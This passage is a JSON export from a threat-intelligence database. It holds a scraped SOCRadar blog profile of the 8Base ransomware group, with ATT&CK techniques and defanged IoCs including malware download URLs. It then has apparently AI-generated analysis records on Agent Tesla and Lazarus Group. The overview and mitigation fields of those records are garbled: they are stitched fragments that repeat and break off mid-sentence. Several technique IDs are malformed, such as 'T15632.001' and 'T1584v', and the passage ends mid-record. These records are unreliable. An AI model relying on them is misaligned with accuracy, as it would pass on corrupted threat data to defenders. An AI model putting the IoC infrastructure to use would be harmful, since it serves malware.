  "content": "We use cookies to ensure you get the best experience. See our platform Terms and Privacy Policy.\nAgree & Continue\nWe're hiring! Partners Contact\nREQUEST DEMO\nFREE ACCESS\nFREE TOOLS\nDark Web Profile: 8Base Ransomware\nJuly 27, 2023\nIn today’s cyber world, while the ransomware scene remains dynamic and active, new actors are emerging with significant numbers of victims. In this article, we will focus on 8Base Ransomware, which ranked in the top 5 most active groups last month according to Daily Dark Web, with 37 victim announcements in June.\nFigure 1. The 10 most active ransomware groups of June 2023 (Source: Daily Dark Web)\nWho is 8Base?\n8Base is a ransomware group that has been active since April 2022. Despite its relatively recent emergence, the group has rapidly gained notoriety due to its aggressive tactics and the significant number of victims it has claimed. The group primarily targets small and medium-sized businesses (SMBs) across various sectors, including business services, finance, manufacturing, and information technology.\nFigure 2. First attack claim shared by 8Base\nThe group’s identity, methods, and motivations largely remain a mystery. However, based on its leak site and public accounts, along with the group’s communications, researchers think the group’s verbal style is quite similar to that of RansomHouse, a group that typically purchases already compromised data or works with data leak sites to extort victims. This has led to speculation that 8Base may be an offshoot of RansomHouse.\nAnother point of view is that 8Base was built directly with the leaked Babuk builder: \nFigure 3. (Source: BushidoToken)\nPutting everything else aside, the group’s rapid rise in activity and the significant number of victims they have claimed have made them a major player in the ransomware landscape. They have been particularly active in recent months, with a significant spike in their activities observed. This has led to them being ranked as one of the top performing ransom groups, further highlighting the threat they pose.\nHow Does 8Base Ransomware Attack?\n8Base is known for its double-extortion tactics. The group threatens to publish the encrypted files unless the ransom is paid, aiming to embarrass the victim by exposing private or confidential information that could damage their brand or reputation. The use of the “double-extortion” tactic has become increasingly common among ransomware groups, as it adds an additional layer of pressure on the victims to pay the ransom.\nThe 8Base ransomware is thought to spread via: \nPhishing emails,\nExploit kits.\nIf you are suspicious that an email you have is phishing, you can use SOCRadar’s Phishing Radar tool, available for free under LABS:\nFigure 4. SOCRadar’s SOC Tools, available for free under SOCRadar LABS\nWhich tools and vulnerabilities does 8Base Ransomware use?\n8Base uses a variety of ransomware strains, including a variant known as Phobos. The group has customized Phobos by appending ‘.8base’ to their encrypted files, but the format of the entire appended portion remains the same as Phobos, which includes an ID section, an email address, and then the file extension. This suggests that 8Base is leveraging Ransomware-as-a-Service (RaaS) offerings, a common practice among ransomware groups.\nQuick Look at 8Base Ransomware’s TOR Site\nWhen we enter the group’s Tor website, we are greeted by a homepage with victim announcements section by section and with descriptions underneath.\nFigure 5. The main page of 8Base Ransomware’s Tor site\nWhen we go to the Contact section, a standard contact form welcomes us, just like an organization’s website.\nFigure 6. Contact Page of 8Base Ransomware’s Tor Site\nWhen we go to the Frequently Asked Questions (FAQ) section, we are greeted with a somewhat long article, first of all we learn about the group’s Telegram and Twitter accounts.\nFigure 7. Head of 8Base Ransomware TOR site FAQ Page\nFrom the FAQ text, several aspects can be inferred about the 8Base:\nBusiness-like Approach: This group operates in a structured, professional manner, with clear policies and procedures. They have dedicated channels for communication and even offer customer support, implying they have a well-organized infrastructure.\nCooperation: The group is open to collaboration with others who share their ethos. They suggest willingness to negotiate ransom deals on behalf of others. However, they clearly state their rejection of any association with ultra-radical groups, indicating an attempt to maintain an image of ethicality.\nEthical Line: The group claims to have ethical boundaries, refusing to engage with extremist groups or release data that violate moral principles. They attempt to legitimize their activities by drawing a line between what they perceive as ethical hacking and malicious activities.\nRespect for Journalism: They seem to value journalism and have special provisions for journalists, indicating their belief in information accessibility. This could also be a strategy to gain media attention and publicity.\nVictim Support: Surprisingly, they claim to offer help to victims of the companies they attack, suggesting that they remove personal data before making it public. They also offer data sets to individuals for potential lawsuits. This could be a strategy to frame their actions as ‘just’ or ‘helpful’ to the public.\nData Disclosure Process: The group follows a process where they first list a company as “Evidence” and later change the status to “Disclosed”. They provide the company an opportunity to prevent data disclosure, indicating a form of negotiation or potential ransom demand. This suggests they primarily aim at financial gain.\nFigure 8. The remaining part of 8Base Ransomware TOR site’s FAQ Page\nIn addition to the FAQ page, there is a sub-page called “Rules.” This page can be thought of as a list of information for victims on how to proceed.\nFigure 9. Terms of Service page of 8Base Ransomware TOR site\nAnd lastly, we can see the About Us section at the bottom of each page: \nFigure 10. “About US” section of 8Base Ransomware\nSOCRadar continuously monitors the dark web and posts news about ransomware groups under the “Ransomware News” heading on the Dark Web News page of the CTI module:\nFigure 11. SOCRadar’s Ransomware News heading under the Dark Web Page of CTI Module (Source: SOCRadar)\nThe group’s leak site describes them as “honest and simple pentesters.” The site offers instructions to victims with sections for Frequently Asked Questions and Rules, along with multiple ways to contact the group. 8Base also maintains an official channel on the messaging service Telegram and an account on Twitter, further demonstrating their sophisticated communication and public relations strategies.\nFigure 12. Twitter Page of 8Base Ransomware\nThey also share files and new claims on their Telegram pages, which for some reason contradict the “ethical” information they provide.\nFigure 13. A Screenshot of 8Base Ransomware’s Telegram Channel\nWhat are the Targets of 8Base Ransomware?\n8Base primarily targets small and medium-sized businesses (SMBs) across various sectors. The group seems to have a preference for certain industries, with businesses in the business services, finance, manufacturing, and information technology sectors being particularly targeted. This could be due to the perceived ability of businesses in these sectors to pay larger ransoms, or it could be due to the nature of their data, which may be more sensitive or valuable.\nThe group’s activities have spiked recently, with the group claiming the second-largest number of victims over the past 30 days, second only to the LockBit 3.0 gang. In May 2023 alone, the group released data from 67 victims they breached between April 2022 and May 2023. This rapid rise in activity and the significant number of victims they have claimed have made them a major player in the ransomware landscape.\nTarget Sectors\nWhen looking at the companies attacked by the group, most of them are companies that operate under the Professional Services industry such as Accounting, Law and Legal Services, Business Services etc. Apart from Professional Services, companies operating in the fields of Manufacturing, Construction, Finance and Insurance, and Healthcare industries also seem to be affected to a great extent.\nFigure 14. Distribution of industries in which companies affected by 8Base Ransomware (Source: SOCRadar)\nTarget Countries\nFigure 15. Countries Affected by 8Base Ransomware (Source: SOCRadar)\nAccording to the group’s attacks, they mostly targeted companies based in the United States, Brazil and the United Kingdom.\nFigure 16. Affected country distribution from 8Base Ransomware (Source: SOCRadar)\nThe attack frequency of 8Base Ransomware\nAs of the time of the research, 8Base, which has nearly 120 claims in total, has been sharing claims in the past, but as of June 4 in 2023, it can be observed that they have been sharing claims much higher than the average in their postings.\nFigure 17. 8Base Ransomware’s claim days and claim numbers in 2023\nAs of April 3, 2022, when the group made its first post, there are a number of claim posts that should not be underestimated during 2022.\nFigure 18. 8Base Ransomware’s claim days and claim numbers in 2022\nConclusion\n8Base represents a new waveof ransomware groups that are highly active, aggressive, and sophisticated. Their rapid rise in activity and the significant number of victims they have claimed have made them a major player in the ransomware landscape. Their use of double-extortion tactics, where they not only encrypt a victim’s data but also threaten to publish it unless the ransom is paid, adds an additional layer of pressure on the victims and makes their attacks even more damaging.\nThe group’s use of Ransomware-as-a-Service (RaaS) offerings and their sophisticated communication and public relations strategies further highlight their capabilities. Their ability to adapt and evolve their tactics and tools, along with their aggressive approach, make them a significant threat that businesses need to be aware of.\nHowever, while the threat posed by 8Base is real and significant, it is not insurmountable. Businesses can protect themselves by implementing robust cybersecurity measures, including keeping their systems and software updated, training their employees to recognize and avoid phishing attacks, and using advanced detection tools to identify and respond to threats quickly.\nMITRE ATT&CK TTPs of 8Base Ransomware\nTechnique\nID\nReconnaissance\nActive Scanning\nT1595\nPhishing for Information\nT1598\nResource Development\nAcquire Infrastructure\nT1583\nDevelop Capabilities\nT1587\nInitial Access\nPhishing: Spearphishing Attachment\nT1566.001\nExecution\nScheduled Task/Job\nT1053\nCommand and Scripting Interpreter\nT1059\nShared Modules\nT1129\nPersistence\nScheduled Task/Job\nT1053\nBoot or Logon Autostart Execution\nT1547\nRegistry Run Keys / Startup Folder\nT1547.001\nPrivilege Escalation\nScheduled Task/Job\nT1053\nBoot or Logon Autostart Execution\nT1547\nRegistry Run Keys / Startup Folder\nT1547.001\nDefense Evasion\nMasquerading\nT1036\nFile Deletion\nT1070.004\nModify Registry\nT1112\nIndirect Command Execution\nT1202\nFile and Directory Permissions Modification\nT1222\nVirtualization/Sandbox Evasion\nT1497\nImpair Defenses\nT1562\nDisable or Modify Tools\nT1562.001\nDisable or Modify System Firewall\nT1562.004\nHide Artifacts\nT1564\nHidden Files and Directories\nT1564.001\nCredential Access\nOS Credential Dumping\nT1003\nInput Capture\nT1056\nDiscovery\nProcess Discovery\nT1057\nSystem Information Discovery\nT1082\nFile and Directory Discovery\nT1083\nVirtualization/Sandbox Evasion\nT1497\nSecurity Software Discovery\nT1518.001\nLateral Movement\nTaint Shared Content\nT1080\nCollection\nData from Local System\nT1005\nInput Capture\nT1056\nData Staged\nT1074\nArchive Collected Data\nT1560\nCommand and Control\nApplication Layer Protocol\nT1071\nWeb Protocols\nT1071.001\nExfiltration\nExfiltration Over C2 Channel\nT1041\nImpact\nData Destruction\nT1485\nInhibit System Recovery\nT1490\nAppendix\nIoCs of 8Base:\nIOC Type\nIOC\nURL\nhxxp[:]//dexblog45[.]xyz/statweb255/\nURL\nhxxp[:]//sentrex219[.]xyz/777/mtx5sfN.exe\nURL\nhxxp[:]//sentrex219[.]xyz/777/skx2auB.exe\nIP\n45.131.66[.]120\nIP\n45.89.125[.]136\nFileName\n8A26.exe\nFileName\n8B7F.exe\nHash\n9769C181ECEF69544BBB2F974B8C0E10\nHash\n5D0F447F4CCC89D7D79C0565372195240CDFA25F\nHash\nE142F4E8EB3FB4323FB377138F53DB66E3E6EC9E82930F4B23DD91A5F7BD45D0\nFor more IOCs, you can visit the Threat Actor/Malware page under the CTI module of SOCRadar XTI Platform.\nShare this:\nLatest Posts\nFrom the Dark Seas of Cyberspace: Unraveling “Fun” Facts of the Dark Web\nReflections of the Israel-Palestine Conflict on the Cyber World\nSOCRadar\nHome\nCyber Threat Intelligence\nDigital Risk Protection\nExternal Attack Surface Management\nSOCRadar Labs\nFree Access\nUse Cases\nCredential & Data Leak Detection\nDark & Deep Web Monitoring\nPhishing Domain Detection & Takedown\nVIP Protection\nIoC Enrichment & SOAR Integration\nResources\nAll-in-One Solution\nBlog\nCase Studies\nNewsletters\nFinancial Data Breaches\nCompany\nAbout Us\nPartners\nEvents\nPrivacy Policy\nInformation Security Policy\nContact Us\nYouTube icon\nTwitter icon\nLinkedIn icon\n© 2023 SOCRadar. All rights reserved.",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-10-10T01:55:20.007Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
}]

==> data/et-isac-db.ReportAnalysis-20231013.json <==
[{
  "_id": {
    "$oid": "64ef7c37e6547742380927e4"
  },
  "report": {
    "$oid": "64ef7c1b12576985d49887be"
  },
  "threat_actor_overview": "Agent Tesla is a remote access Trojan (RAT) designed to provide unauthorized access and control over infected computers remotely. It is used to steal sensitive information such as login credentials,  financial data,  and personal information from compromised systems., Agent Tesla is a remote access Trojan (RAT) used to gain unauthorized access and control over infected computers remotely. It is primarily used to steal sensitive information such as login credentials,  and personal information. Agent Tesla can target businesses through their employees and is often distributed through phishing emails.,  and personal information from compromised systems. It can be employed in business email compromise scams and targets individuals and companies through phishing tactics., Agent Tesla is a remote access Trojan (RAT) that is used for unauthorized access and control over infected computers remotely. It is primarily used for stealing sensitive information such as login credentials,  and personal information., Agent Tesla is a remote access Trojan (RAT) designed to provide unauthorized access and control over infected computers remotely. It steals sensitive information such as login credentials,  and personal information. It is commonly used for business email compromise (BEEC) scams and phishing attacks., Agent Tesla is a type of malicious software known as a remote access Trojan (RAT). It is designed to provide unauthorized access and control over infected computers remotely. Agent Tesla is often used to steal sensitive information from compromised systems,  such as login credentials,  and personal information. It can also target businesses through their employees., Agent Tesla is a remote access Trojan (RAT) that is used to provide unauthorized access and control over infected computers remotely. Its primary goal is to steal sensitive information,  and personal information,  from compromised systems. It is often used by business email compromise scammers and can be employed to target individuals and companies in various industries., Agent Tesla is a type of remote access Trojan (RAT) designed to provide unauthorized access and control over infected computers remotely. It is primarily used for stealing sensitive information,  from compromised systems. It can also target businesses through their employees.",
  "aliases": [
    "AgenTesla",
    "Negasteal",
    "AgentTesla"
  ],
  "sources": [
    "Any.run",
    "Bleeping Computer",
    "Malpedia",
    "Dark Reading",
    "Mitre"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain",
    "Espionage",
    "Notoriety"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft",
    "Credential Harvesting",
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [
    "T1566.001",
    "T1203",
    "T1053.005",
    "T1204.002",
    "T1047",
    "T1547.001",
    "T1055",
    "T1055.012",
    "T1140",
    "T1564.001",
    "T1564.003",
    "T15632.001",
    "T1027",
    "T1218.009",
    "T1497",
    "T1555",
    "T1555.003",
    "T1056.001",
    "T1552.001",
    "T1552.002",
    "T1087.001",
    "T1057",
    "T1082",
    "T1016",
    "T1033",
    "T1124",
    "T1112",
    "T1560",
    "T1185",
    "T1115",
    "T1113",
    "T1125",
    "T1071.003",
    "T1071.001",
    "T1105",
    "T1048.003"
  ],
  "threat_actor_resources": [
    "organization",
    "government"
  ],
  "threat_actor_type": [
    "criminal",
    "hacker"
  ],
  "threat_actor_sophistication": "intermediate",
  "target_countries": [],
  "target_regions": [
    "americas",
    "europe",
    "asia"
  ],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "Keep software and systems up to date, Develop and maintain a firewall, Implement email filtering and spam system, Monitor network activity, Develop a response plan,  implement firewall and email filtering,  monitor network activity,  and have a response plan., Maintain a firewall, Keep your software and systems up to date, Implement an email filtering and spam system, Maintain firewall",
  "attack_consequences": "Loss of sensitive information, Loss of sensitive information (classified documents, banking credentials, financial information), Loss of sensitive information (e.g., classified documents, banking credentials, financial information)",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Agent Tesla\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Keep software and systems up to date, Develop and maintain a firewall, Implement email filtering and spam system, Monitor network activity, Develop a response plan,  implement firewall and email filtering,  monitor network activity,  and have a response plan., Maintain a firewall, Keep your software and systems up to date, Implement an email filtering and spam system, Maintain firewall\", \"attack_consequences\": \"Loss of sensitive information, Loss of sensitive information (classified documents, banking credentials, financial information), Loss of sensitive information (e.g., classified documents, banking credentials, financial information)\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Agent Tesla is a remote access Trojan (RAT) designed to provide unauthorized access and control over infected computers remotely. It is used to steal sensitive information such as login credentials,  financial data,  and personal information from compromised systems., Agent Tesla is a remote access Trojan (RAT) used to gain unauthorized access and control over infected computers remotely. It is primarily used to steal sensitive information such as login credentials,  and personal information. Agent Tesla can target businesses through their employees and is often distributed through phishing emails.,  and personal information from compromised systems. It can be employed in business email compromise scams and targets individuals and companies through phishing tactics., Agent Tesla is a remote access Trojan (RAT) that is used for unauthorized access and control over infected computers remotely. It is primarily used for stealing sensitive information such as login credentials,  and personal information., Agent Tesla is a remote access Trojan (RAT) designed to provide unauthorized access and control over infected computers remotely. It steals sensitive information such as login credentials,  and personal information. It is commonly used for business email compromise (BEEC) scams and phishing attacks., Agent Tesla is a type of malicious software known as a remote access Trojan (RAT). It is designed to provide unauthorized access and control over infected computers remotely. Agent Tesla is often used to steal sensitive information from compromised systems,  such as login credentials,  and personal information. It can also target businesses through their employees., Agent Tesla is a remote access Trojan (RAT) that is used to provide unauthorized access and control over infected computers remotely. Its primary goal is to steal sensitive information,  and personal information,  from compromised systems. It is often used by business email compromise scammers and can be employed to target individuals and companies in various industries., Agent Tesla is a type of remote access Trojan (RAT) designed to provide unauthorized access and control over infected computers remotely. It is primarily used for stealing sensitive information,  from compromised systems. It can also target businesses through their employees.\", \"target_countries\": [], \"target_regions\": [\"americas\", \"europe\", \"asia\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Credential Harvesting\", \"Disruption of Service\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [\"T1566.001\", \"T1203\", \"T1053.005\", \"T1204.002\", \"T1047\", \"T1547.001\", \"T1055\", \"T1055.012\", \"T1140\", \"T1564.001\", \"T1564.003\", \"T15632.001\", \"T1027\", \"T1218.009\", \"T1497\", \"T1555\", \"T1555.003\", \"T1056.001\", \"T1552.001\", \"T1552.002\", \"T1087.001\", \"T1057\", \"T1082\", \"T1016\", \"T1033\", \"T1124\", \"T1112\", \"T1560\", \"T1185\", \"T1115\", \"T1113\", \"T1125\", \"T1071.003\", \"T1071.001\", \"T1105\", \"T1048.003\"], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\", \"Notoriety\"], \"threat_actor_resources\": [\"individual\", \"club\", \"contest\", \"team\", \"organization\", \"government\"], \"threat_actor_type\": [\"criminal\", \"hacker\"], \"aliases\": [\"AgenTesla\", \"Negasteal\", \"AgentTesla\"], \"vulnerabilities\": [], \"sources\": [\"Any.run\", \"Bleeping Computer\", \"Malpedia\", \"Dark Reading\", \"Mitre\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Agent Tesla\"], \"aliases\": [\"AgenTesla\", \"Negasteal\", \"AgentTesla\"], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [\"americas\", \"europe\", \"asia\"], \"threat_actor_overview\": [\"Agent Tesla is a remote access Trojan (RAT) designed to provide unauthorized access and control over infected computers remotely. It is used to steal sensitive information such as login credentials\", \" financial data\", \" and personal information from compromised systems.\", \"Agent Tesla is a remote access Trojan (RAT) used to gain unauthorized access and control over infected computers remotely. It is primarily used to steal sensitive information such as login credentials\", \" and personal information. Agent Tesla can target businesses through their employees and is often distributed through phishing emails.\", \" and personal information from compromised systems. It can be employed in business email compromise scams and targets individuals and companies through phishing tactics.\", \"Agent Tesla is a remote access Trojan (RAT) that is used for unauthorized access and control over infected computers remotely. It is primarily used for stealing sensitive information such as login credentials\", \" and personal information.\", \"Agent Tesla is a remote access Trojan (RAT) designed to provide unauthorized access and control over infected computers remotely. It steals sensitive information such as login credentials\", \" and personal information. It is commonly used for business email compromise (BEEC) scams and phishing attacks.\", \"Agent Tesla is a type of malicious software known as a remote access Trojan (RAT). It is designed to provide unauthorized access and control over infected computers remotely. Agent Tesla is often used to steal sensitive information from compromised systems\", \" such as login credentials\", \" and personal information. It can also target businesses through their employees.\", \"Agent Tesla is a remote access Trojan (RAT) that is used to provide unauthorized access and control over infected computers remotely. Its primary goal is to steal sensitive information\", \" and personal information\", \" from compromised systems. It is often used by business email compromise scammers and can be employed to target individuals and companies in various industries.\", \"Agent Tesla is a type of remote access Trojan (RAT) designed to provide unauthorized access and control over infected computers remotely. It is primarily used for stealing sensitive information\", \" from compromised systems. It can also target businesses through their employees.\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Credential Harvesting\", \"Disruption of Service\"], \"threat_actor_capabilities\": [\"T1566.001\", \"T1203\", \"T1053.005\", \"T1204.002\", \"T1047\", \"T1547.001\", \"T1055\", \"T1055.012\", \"T1140\", \"T1564.001\", \"T1564.003\", \"T15632.001\", \"T1027\", \"T1218.009\", \"T1497\", \"T1555\", \"T1555.003\", \"T1056.001\", \"T1552.001\", \"T1552.002\", \"T1087.001\", \"T1057\", \"T1082\", \"T1016\", \"T1033\", \"T1124\", \"T1112\", \"T1560\", \"T1185\", \"T1115\", \"T1113\", \"T1125\", \"T1071.003\", \"T1071.001\", \"T1105\", \"T1048.003\"], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\", \"Notoriety\"], \"threat_actor_resources\": [\"individual\", \"unknown\", \"club\", \"contest\", \"team\", \"organization\", \"government\"], \"threat_actor_sophistication\": [\"intermediate\", \"none\"], \"threat_actor_type\": [\"criminal\", \"hacker\"], \"attack_mitigations\": [\"Keep software and systems up to date\", \"Develop and maintain a firewall\", \"Implement email filtering and spam system\", \"Monitor network activity\", \"Develop a response plan\", \" implement firewall and email filtering\", \" monitor network activity\", \" and have a response plan.\", \"Maintain a firewall\", \"Keep your software and systems up to date\", \"Implement an email filtering and spam system\", \"Maintain firewall\"], \"attack_consequences\": [\"Loss of sensitive information\", \"Loss of sensitive information (classified documents, banking credentials, financial information)\", \"Loss of sensitive information (e.g., classified documents, banking credentials, financial information)\"], \"vulnerabilities\": [], \"sources\": [\"Any.run\", \"Bleeping Computer\", \"Malpedia\", \"Dark Reading\", \"Mitre\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "JODXxzgrRphYBU6pDa6huM2JSPL2",
  "approval_status_changed_on": {
    "$date": "2023-08-31T20:48:57.375Z"
  },
  "approval_message": "Updating sectors",
  "change_log": [
    {
      "_id": {
        "$oid": "64efa43f638ee135e1dcb3d1"
      },
      "updated_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
      "updated_on": {
        "$date": "2023-08-30T20:19:11.929Z"
      },
      "changes": [
        {
          "field": "threat_actor_sophistication",
          "previous_value": "none",
          "updated_value": "intermediate"
        }
      ]
    },
    {
      "_id": {
        "$oid": "64efa3d5638ee135e1dcb3d0"
      },
      "updated_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
      "updated_on": {
        "$date": "2023-08-30T20:17:25.594Z"
      },
      "changes": [
        {
          "field": "threat_actor_resources",
          "previous_value": [
            "individual",
            "club",
            "contest",
            "team",
            "organization",
            "government"
          ],
          "updated_value": [
            "organization",
            "government"
          ]
        }
      ]
    }
  ],
  "threat_actor": "Agent Tesla"
},
{
  "_id": {
    "$oid": "64ef85b2525aebe0a35d84e0"
  },
  "report": {
    "$oid": "64ef8595ae50e77b5ba6d3ef"
  },
  "threat_actor_overview": "Lazarus Group is a North Korean state-sponsored cyber threat group that has been active since 2009. They have gained infamy for their involvement in major cyberattacks including the destructive wiper attack on Sony Pictures Entertainment in 2014. Lazarus Group has become a widely used term to encompass multiple groups,  and their activities pose financial losses,  national security concerns,  and the need for international collaboration to address this evolving cyber threat., Lazarus Group is a North Korean state-sponsored cyber threat group that has been active since 2009. They gained infamy for their involvement in major cyberattacks,  including the destructive attack on Sony Pictures Entertainment in 2014. Lazarus Group is known for its sophisticated techniques and expanding scope of targeting global organizations., Lazarus Group is a North Korean state-sponsored cyber threat group that has been active since 2009. They have gained infamy for their involvement in major cyberattacks,  including the Sony Pictures Entertainment attack in 2014. Lazarus Group has expanded their scope to target global organizations and developed sophisticated malware and techniques to evade detection., Lazarus Group,  also known as Hidden Cobra,  Guardians of Peace,  and ZINC,  is a North Korean state-sponsored cyber threat group. They have been active since 2009 and gained infamy for their involvement in major cyberattacks. Lazarus Group has expanded their scope to target global organizations,  developing sophisticated malware and techniques to evade detection., Lazarus Group is a North Korean state-sponsored cyber threat group. They have been active since 2009 and gained infamy for their involvement in major cyberattacks. Lazarus Group has been associated with various campaigns such as Operation Blockbuster,  Operation Flame,  and DarkSeoul. Initially focused on cryptocurrency-related targets,  they have now expanded their scope to target global organizations.,  a North Korean state-sponsored cyber threat group,  has been active since 2009 and gained infamy for their involvement in major cyberattacks,  including the destructive wiper attack on Sony Pictures Entertainment in 2014. They have been associated with various campaigns such as Operation Blockbuster,  and DarkSeoul. While differentiating North Korean cyber groups can be challenging,  Lazarus Group has become a widely used term to encompass multiple groups. Initially focused on cryptocurrency-related targets,  Lazarus Group has now expanded their scope to target global organizations,  developing sophisticated malware and techniques to evade detection. The implications of their activities include financial losses,  including the destructive wiper attack on Sony Pictures Entertainment in 2014. Lazarus Group has become a widely used term to encompass multiple groups. They have expanded their scope to target global organizations,  is a North Korean state-sponsored cyber threat group. They have been active since 2009 and have gained infamy for their involvement in major cyberattacks. Lazarus Group has targeted various industries and organizations globally.",
  "aliases": [
    "Lazarus"
  ],
  "sources": [
    "Bank Info Security",
    "BleepingComputer",
    "CyberWire",
    "DarkReading",
    "InfoSecurity Magazine",
    "MITRE ATT&CK",
    "SC Media"
  ],
  "country_of_origin": "KP",
  "threat_actor_motives": [
    "Financial Gain",
    "Cyberwarfare",
    "Espionage",
    "Notoriety"
  ],
  "threat_actor_intent": [
    "Damage and Destruction",
    "Financial Theft",
    "Disruption of Service",
    "Espionage",
    "Information Theft",
    "Credential Harvesting"
  ],
  "threat_actor_capabilities": [
    "T1059",
    "T1203",
    "T1218",
    "T1053.005",
    "T1059.001",
    "T1047",
    "T1055.001",
    "T1053.005",
    "T1051",
    "T1110",
    "T1057",
    "T1124",
    "T1082",
    "T1021.001",
    "T1021.002",
    "T1021.004",
    "T1190",
    "T1204",
    "T1485",
    "T1491",
    "T1561",
    "T1589",
    "T1591",
    "T1593.001",
    "T1583",
    "T1584v",
    "T1587.002",
    "T1587.001",
    "T1585",
    "T1608",
    "T1189",
    "T1566",
    "T1078",
    "T1106",
    "T1098",
    "T1547.001",
    "T1547.009",
    "T1543.003",
    "T1574.002",
    "T1574.013",
    "T1542.003",
    "T1505.004",
    "T1134.002",
    "T1564.001",
    "T1562.004",
    "T1562.001",
    "T1070.003",
    "T1070.004",
    "T1070.006",
    "T1036",
    "T1027",
    "T1221",
    "T1497",
    "T1220",
    "T1087.002",
    "T1010",
    "T1622",
    "T1083",
    "T1046",
    "T1012",
    "T1534",
    "T1560",
    "T1005",
    "T1074",
    "T1056.001",
    "T1071.001",
    "T1132.001",
    "T1001.003",
    "T1573.001",
    "T1008",
    "T1105",
    "T1104",
    "T1571",
    "T1090",
    "T1102.002",
    "T1048.003",
    "T1041",
    "T1567.002",
    "T1491.001",
    "T1489",
    "T1529",
    "T1048.003",
    "T1557.001",
    "T1110.003",
    "T1078.002",
    "T1584",
    "T1562.003",
    "T1600.001",
    "T1134.001",
    "T1148.003"
  ],
  "threat_actor_resources": [
    "government",
    "organization"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "US",
    "KR",
    "JP",
    "CN",
    "IN",
    "GB",
    "RU",
    "DE",
    "FR",
    "SA",
    "PK",
    "BG"
  ],
  "target_regions": [
    "americas",
    "asia",
    "europe",
    "africa",
    "oceania",
    "eastern-asia",
    "southern-asia",
    "south-eastern-asia",
    "eastern-europe",
    "western-europe"
  ],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "Monitor and Secure System Networks, Monitor and Secure Active Directories, Routinely Train and Test Staff on Internet Security, Follow NIST standards on Password Safety, Do NOT Grant Privileges Unnecessarily, Create Secure Group Policies,  Monitor and Secure Active Directories,  Routinely Train and Test Staff on Internet Security,  Follow NIST standards on Password Safety,  Do NOT Grant Privileges Unnecessarily,  Create Secure Group Policies",
  "attack_consequences": "Data Loss, Financial Loss, Service Loss, Data Termination",
  "vulnerabilities": [
    "CVE-2018-4878",
    "Log4j Vulnerability"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"Lazarus Group\", \"country_of_origin\": \"KP\", \"attack_mitigations\": \"Monitor and Secure System Networks, Monitor and Secure Active Directories, Routinely Train and Test Staff on Internet Security, Follow NIST standards on Password Safety, Do NOT Grant Privileges Unnecessarily, Create Secure Group Policies,  Monitor and Secure Active Directories,  Routinely Train and Test Staff on Internet Security,  Follow NIST standards on Password Safety,  Do NOT Grant Privileges Unnecessarily,  Create Secure Group Policies\", \"attack_consequences\": \"Data Loss, Financial Loss, Service Loss, Data Termination\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Lazarus Group is a North Korean state-sponsored cyber threat group that has been active since 2009. They have gained infamy for their involvement in major cyberattacks including the destructive wiper attack on Sony Pictures Entertainment in 2014. Lazarus Group has become a widely used term to encompass multiple groups,  and their activities pose financial losses,  national security concerns,  and the need for international collaboration to address this evolving cyber threat., Lazarus Group is a North Korean state-sponsored cyber threat group that has been active since 2009. They gained infamy for their involvement in major cyberattacks,  including the destructive attack on Sony Pictures Entertainment in 2014. Lazarus Group is known for its sophisticated techniques and expanding scope of targeting global organizations., Lazarus Group is a North Korean state-sponsored cyber threat group that has been active since 2009. They have gained infamy for their involvement in major cyberattacks,  including the Sony Pictures Entertainment attack in 2014. Lazarus Group has expanded their scope to target global organizations and developed sophisticated malware and techniques to evade detection., Lazarus Group,  also known as Hidden Cobra,  Guardians of Peace,  and ZINC,  is a North Korean state-sponsored cyber threat group. They have been active since 2009 and gained infamy for their involvement in major cyberattacks. Lazarus Group has expanded their scope to target global organizations,  developing sophisticated malware and techniques to evade detection., Lazarus Group is a North Korean state-sponsored cyber threat group. They have been active since 2009 and gained infamy for their involvement in major cyberattacks. Lazarus Group has been associated with various campaigns such as Operation Blockbuster,  Operation Flame,  and DarkSeoul. Initially focused on cryptocurrency-related targets,  they have now expanded their scope to target global organizations.,  a North Korean state-sponsored cyber threat group,  has been active since 2009 and gained infamy for their involvement in major cyberattacks,  including the destructive wiper attack on Sony Pictures Entertainment in 2014. They have been associated with various campaigns such as Operation Blockbuster,  and DarkSeoul. While differentiating North Korean cyber groups can be challenging,  Lazarus Group has become a widely used term to encompass multiple groups. Initially focused on cryptocurrency-related targets,  Lazarus Group has now expanded their scope to target global organizations,  developing sophisticated malware and techniques to evade detection. The implications of their activities include financial losses,  including the destructive wiper attack on Sony Pictures Entertainment in 2014. Lazarus Group has become a widely used term to encompass multiple groups. They have expanded their scope to target global organizations,  is a North Korean state-sponsored cyber threat group. They have been active since 2009 and have gained infamy for their involvement in major cyberattacks. Lazarus Group has targeted various industries and organizations globally.\", \"target_countries\": [\"US\", \"KR\", \"JP\", \"CN\", \"IN\", \"GB\", \"RU\", \"DE\", \"FR\", \"SA\", \"PK\", \"BG\"], \"target_regions\": [\"americas\", \"asia\", \"europe\", \"africa\", \"oceania\", \"eastern-asia\", \"southern-asia\", \"south-eastern-asia\", \"eastern-europe\", \"western-europe\"], \"target_populations\": [], \"threat_actor_intent\": [\"Damage and Destruction\", \"Financial Theft\", \"Disruption of Service\", \"Espionage\", \"Information 